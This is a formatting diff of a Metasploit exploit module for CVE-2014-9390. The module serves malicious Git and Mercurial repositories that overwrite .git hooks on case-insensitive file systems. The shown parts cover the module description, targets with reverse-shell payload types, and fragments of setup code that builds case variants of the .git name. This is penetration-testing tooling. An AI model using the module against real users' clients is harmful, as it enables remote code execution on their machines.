@@ -11,61 +11,60 @@ class MetasploitModule < Msf::Exploit::Remote
   include Msf::Exploit::Powershell
 
   def initialize(info = {})
-    super(update_info(
-      info,
-      'Name' => 'Malicious Git and Mercurial HTTP Server For CVE-2014-9390',
-      'Description' => %q(
-        This module exploits CVE-2014-9390, which affects Git (versions less
-        than 1.8.5.6, 1.9.5, 2.0.5, 2.1.4 and 2.2.1) and Mercurial (versions
-        less than 3.2.3) and describes three vulnerabilities.
+    super(
+      update_info(
+        info,
+        'Name' => 'Malicious Git and Mercurial HTTP Server For CVE-2014-9390',
+        'Description' => %q{
+          This module exploits CVE-2014-9390, which affects Git (versions less
+          than 1.8.5.6, 1.9.5, 2.0.5, 2.1.4 and 2.2.1) and Mercurial (versions
+          less than 3.2.3) and describes three vulnerabilities.
 
-        On operating systems which have case-insensitive file systems, like
-        Windows and OS X, Git clients can be convinced to retrieve and
-        overwrite sensitive configuration files in the .git
-        directory which can allow arbitrary code execution if a vulnerable
-        client can be convinced to perform certain actions (for example,
-        a checkout) against a malicious Git repository.
+          On operating systems which have case-insensitive file systems, like
+          Windows and OS X, Git clients can be convinced to retrieve and
+          overwrite sensitive configuration files in the .git
+          directory which can allow arbitrary code execution if a vulnerable
+          client can be convinced to perform certain actions (for example,
+          a checkout) against a malicious Git repository.
 
-        A second vulnerability with similar characteristics also exists in both
-        Git and Mercurial clients, on HFS+ file systems (Mac OS X) only, where
-        certain Unicode codepoints are ignorable.
+          A second vulnerability with similar characteristics also exists in both
+          Git and Mercurial clients, on HFS+ file systems (Mac OS X) only, where
+          certain Unicode codepoints are ignorable.
 
-        The third vulnerability with similar characteristics only affects
-        Mercurial clients on Windows, where Windows "short names"
-        (MS-DOS-compatible 8.3 format) are supported.
+          The third vulnerability with similar characteristics only affects
+          Mercurial clients on Windows, where Windows "short names"
+          (MS-DOS-compatible 8.3 format) are supported.
 
-        Today this module only truly supports the first vulnerability (Git
-        clients on case-insensitive file systems) but has the functionality to
-        support the remaining two with a little work.
-      ),
-      'License' => MSF_LICENSE,
-      'Author' => [
-        'Jon Hart <jon_hart[at]rapid7.com>' # metasploit module
-      ],
-      'References'     =>
-        [
+          Today this module only truly supports the first vulnerability (Git
+          clients on case-insensitive file systems) but has the functionality to
+          support the remaining two with a little work.
+        },
+        'License' => MSF_LICENSE,
+        'Author' => [
+          'Jon Hart <jon_hart[at]rapid7.com>' # metasploit module
+        ],
+        'References' => [
           ['CVE', '2014-9390'],
           ['URL', 'https://www.rapid7.com/blog/post/2015/01/01/12-days-of-haxmas-exploiting-cve-2014-9390-in-git-and-mercurial'],
           ['URL', 'http://git-blame.blogspot.com.es/2014/12/git-1856-195-205-214-and-221-and.html'],
           ['URL', 'http://article.gmane.org/gmane.linux.kernel/1853266'],
           ['URL', 'https://github.com/blog/1938-vulnerability-announced-update-your-git-clients'],
           ['URL', 'https://www.mehmetince.net/one-git-command-may-cause-you-hacked-cve-2014-9390-exploitation-for-shell/'],
-          ['URL', 'http://mercurial.selenic.com/wiki/WhatsNew#Mercurial_3.2.3_.282014-12-18.29'],
+          ['URL', 'http://web.archive.org/web/20221226100335/https://mercurial.selenic.com/wiki/WhatsNew'],
           ['URL', 'http://selenic.com/repo/hg-stable/rev/c02a05cc6f5e'],
           ['URL', 'http://selenic.com/repo/hg-stable/rev/6dad422ecc5a']
 
         ],
-      'DisclosureDate' => '2014-12-18',
-      'Targets' =>
-        [
+        'DisclosureDate' => '2014-12-18',
+        'Targets' => [
           [
             'Automatic',
             {
               'Platform' => [ 'unix' ],
-              'Arch'     => ARCH_CMD,
-              'Payload'        =>
+              'Arch' => ARCH_CMD,
+              'Payload' =>
                 {
-                  'Compat'      =>
+                  'Compat' =>
                     {
                       'PayloadType' => 'cmd cmd_bash',
                       'RequiredCmd' => 'generic bash-tcp perl'
@@ -77,17 +76,18 @@ class MetasploitModule < Msf::Exploit::Remote
             'Windows Powershell',
             {
               'Platform' => [ 'windows' ],
-              'Arch'     => [ARCH_X86, ARCH_X64]
+              'Arch' => [ARCH_X86, ARCH_X64]
             }
           ]
         ],
-      'DefaultTarget'  => 0,
-      'Notes' =>
-        {
+        'DefaultTarget' => 0,
+        'Notes' => {
           'Stability' => [ CRASH_SAFE ],
           'Reliability' => [ REPEATABLE_SESSION ],
           'SideEffects' => [ ARTIFACTS_ON_DISK, SCREEN_EFFECTS ]
-        }))
+        }
+      )
+    )
 
     register_options(
       [
@@ -128,6 +128,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
   def setup_git
     return unless datastore['GIT']
+
     # URI must start with a /
     unless git_uri && git_uri =~ /^\//
       fail_with(Failure::BadConfig, 'GIT_URI must start with a /')
@@ -179,7 +180,7 @@ class MetasploitModule < Msf::Exploit::Remote
     # build a tree that points to the partially uppercased .git directory in
     # which hooks live
     variants = []
-    %w(g G). each do |g|
+    %w(g G).each do |g|
       %w(i I).each do |i|
         %w(t T).each do |t|
           git = g + i + t
@@ -206,6 +207,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
   def setup_mercurial
     return unless datastore['MERCURIAL']
+
     # URI must start with a /
     unless mercurial_uri && mercurial_uri =~ /^\//
       fail_with(Failure::BadConfig, 'MERCURIAL_URI must start with a /')
@@ -343,6 +345,7 @@ HTML
   # Returns the value of GIT_URI if not blank, otherwise returns a random .git URI
   def git_uri
     return @git_uri if @git_uri
+
     if datastore['GIT_URI'].blank?
       @git_uri = '/' + Rex::Text.rand_text_alpha(rand(10) + 2).downcase + '.git'
     else
@@ -353,6 +356,7 @@ HTML
   # Returns the value of MERCURIAL_URI if not blank, otherwise returns a random URI
   def mercurial_uri
     return @mercurial_uri if @mercurial_uri
+
     if datastore['MERCURIAL_URI'].blank?
       @mercurial_uri = '/' + Rex::Text.rand_text_alpha(rand(10) + 6).downcase
     else
